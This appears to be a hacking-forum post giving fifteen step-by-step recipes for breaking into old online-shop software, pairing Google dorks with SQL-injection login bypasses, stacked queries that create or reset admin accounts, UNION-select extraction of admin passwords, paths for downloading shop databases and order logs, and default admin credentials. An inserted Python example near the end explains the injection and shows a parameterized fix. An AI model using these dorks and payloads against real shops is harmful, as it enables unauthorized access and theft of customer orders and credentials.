    Author
    chmood
    Hack - Shopadmins - Exploits - Dorks




    1:
    google dork :--> inurl:"/cart.php?m="
    target looks like :--> http://xxxxxxx.com/s...cart.php?m=view
    exploit: change cart.php?m=view to /admin
    target with exploit :--> http://xxxxxx.com/store/admin
    Username : 'or"="
    Password : 'or"=

    2:
    google dork :--> allinurlroddetail.asp?prod=
    target looks like :--> xxxxx.org (big letters and numbers )
    exploit :--> change the proddtail.asp?prod=SG369 with fpdb/vsproducts.mdb
    target with exploit :--> http://www.xxxxxx.org/fpdb/vsproducts.mdb


    3:
    google dork :--> allinurl: /cgi-local/shopper.cgi
    target looks like :--> http://www.xxxxxx.co....dd=action&key=
    exploit :--> ...&template=order.log
    target with exploit :--> http://www.xxxxxxxx.....late=order.log


    4:
    google dork :--> allinurl: Lobby.asp
    target looks like :--> http://www.xxxxx.com/mall/lobby.asp
    exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
    target with exploit :--> http://www.xxxxx.com/fpdb/shop.mdb


    5:
    google dork :--> allinurl:/vpasp/shopsearch.asp
    when u find a target put this in search box
    Keyword=&category=5); insert into tbluser (fldusername) values
    ('')--&SubCategory=&hide=&action.x=46&action.y=6
    Keyword=&category=5); update tbluser set fldpassword='' where
    fldusername=''--&SubCategory=All&action.x=33&action.y=6
    Keyword=&category=3); update tbluser set fldaccess='1' where
    fldusername=''--&SubCategory=All&action.x=33&action.y=6
    Don't forget to replace the and with whatever you like.
    To change the admin password, enter the following keyword:
    Keyword=&category=5); update tbluser set fldpassword='' where
    fldusername='admin'--&SubCategory=All&action.x=33&action.y=6


    login page: http://xxxxxxx/vpasp/shopadmin.asp


    6:
    google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
    target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx
    exploit :--> http://xxxxxxx.com/vpasp/shopdisplay...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
    if this does not work, try these endings:
    %20'a%25'--
    %20'b%25'--
    %20'c%25'--
    after finding user and pass go to login page:
    http://xxxx.com/vpasp/shopadmin.asp


    7:
    google dork :--> allinurl:/shopadmin.asp
    target looks like :--> http://www.xxxxxx.com/shopadmin.asp
    exploit:
    user : 'or'1
    pass : 'or'1

    8:
    google.com :--> allinurl:/store/index.cgi/page=
    target looks like :--> http://www.xxxxxx.co....short_blue.htm
    exploit :--> ../admin/files/order.log
    target with exploit :--> http://www.xxxxxxx.c....iles/order.log

    9:
    google.com:--> allinurl:/metacart/
    target looks like :--> http://www.xxxxxx.com/metacart/about.asp
    exploit :--> /database/metacart.mdb
    target with exploit :--> http://www.xxxxxx.com/metacart/database/metacart.mdb

    10:
    google.com:--> allinurl:/DCShop/
    target looks like :--> http://www.xxxxxx.com/xxxx/DCShop/xxxx
    exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
    target with exploit :--> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt or http://www.xxxx.com/xxxx/DCShop/Orders/orders.txt


    11:
    google.com:--> allinurl:/shop/category.asp/catid=
    target looks like :--> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
    exploit :--> /admin/dbsetup.asp
    target with exploit :--> http://www.xxxxxx.com/admin/dbsetup.asp
    after getting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
    target for dl the data base :--> http://www.xxxxxx.com/data/pdshoppro.mdb (doesn't need to be like this)
    in db look for access to find pass and user of shop admins.


    12:
    google.com:--> allinurl:/commercesql/
    target looks like :--> http://www.xxxxx.com/commercesql/xxxxx
    exploit :--> cgi-bin/commercesql/index.cgi?page=
    target with exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
    target with exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
    target with exploit order.log :--> http://www.xxxxx.com....iles/order.log

    13:
    google.com:--> allinurl:/eshop/
    target looks like :--> http://www.xxxxx.com/xxxxx/eshop
    exploit :-->/cg-bin/eshop/database/order.mdb
    target with exploit :--> http://www.xxxxxx.co....base/order.mdb
    after dl the db look at access for user and password


    14:
    1/ search google: allinurl:"shopdisplayproducts.asp?id=
    --->http://victim.com/shopdisplayproducts.asp?id=5


    2/ find error by adding '
    --->http://victim.com/shopdisplayproducts.asp?id=5'


    --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467


    -If you don't see error then change id to cat


    --->http://victim.com/shopdisplayproducts.asp?cat=5'


    3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password


    --->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password


    --->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......


    4/ add 2,3,4,5,6.......until you see a nice table


    add 2
    ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
    then 3
    ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
    then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password


    ...5,6,7,8,9.... until you see a table. (exp:...47)


    ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
    ---->see a table.




    5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password


    --->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password


    6/ Find link admin to login:
    try this first: http://victim.com/shopadmin.asp
    or: http://victim.com/shopadmin.asp




    Didn't work? then u have to find yourself:


    add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password


    --->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password




    you'll see something like: ( lot of them)


    shopaddmoretocart.asp
    shopcheckout.asp
    shopdisplaycategories.asp
    ..............


    then guess admin link by adding the above data until you find admin links

    15:
    xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
    the most important thing here is xDatabase
    xDatabase: shopping140
    ok now the URL will be like this:
    ****://***.victim.com/shop/shopping140.mdb
    if you didn't download the Database..
    Try this while there is dblocation.
    xDblocation
    resx


    the url will be:
    ****://***.victim.com/shop/resx/shopping140.mdb
    If u see the error message you have to try this :
    ****://***.victim.com/shop/shopping500.mdb


    download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com


    inside you should be able to find *** information.
    and you should even be able to find the admin username and password for the website.


    the admin login page is usually located here
    ****://***.victim.com/shop/shopadmin.asp


    if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are


    Username: admin
    password: admin
    OR
    Username: vpasp
    password: vpasp
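
    Why the quote-based logins in items 1 and 7 work, and the fix, as an added example that is not part of the original post or any cart's own code. It assumes a Python/SQLite stand-in for the ASP/Access login; the function names and the sample password are hypothetical, and only the table and column names come from the post.

```python
import hashlib
import hmac
import os
import sqlite3

def derive(password, salt):
    # Salted, slow hash: a copied user table does not hand over passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

def make_db():
    """Constructed in-memory user table using the post's column names."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbluser (fldusername TEXT PRIMARY KEY,"
               " salt BLOB, fldpassword BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO tbluser VALUES (?, ?, ?)",
               ("admin", salt, derive("constructed-sample-pw", salt)))
    return db

def login_concat(db, user, password):
    """'Before' form, shown only for how the query text is built: the form
    fields are pasted into the SQL, so a quote in them ends the string
    literal and the remainder is parsed as part of the WHERE clause."""
    sql = ("SELECT 1 FROM tbluser WHERE fldusername = '" + user +
           "' AND fldpassword = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_bound(db, user, password):
    """Hardened form: the username is a bound parameter, so it is compared
    as data, and the password check happens outside SQL on a salted hash."""
    row = db.execute("SELECT salt, fldpassword FROM tbluser"
                     " WHERE fldusername = ?", (user,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(derive(password, row[0]), row[1])

if __name__ == "__main__":
    db = make_db()
    quoted = "'or'1"  # the value from item 7 of the post
    print("concatenated query accepts it:", login_concat(db, quoted, quoted))
    print("bound query accepts it:       ", login_bound(db, quoted, quoted))
```

    Removing the default admin/admin and vpasp/vpasp accounts listed above belongs in the same change, since binding parameters does nothing against a correct default password.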

    Hope you enjoy this thread !!
    if you like it, Don't forget to say thanks T.I Sniper


    December 16, 2015 • 0 comments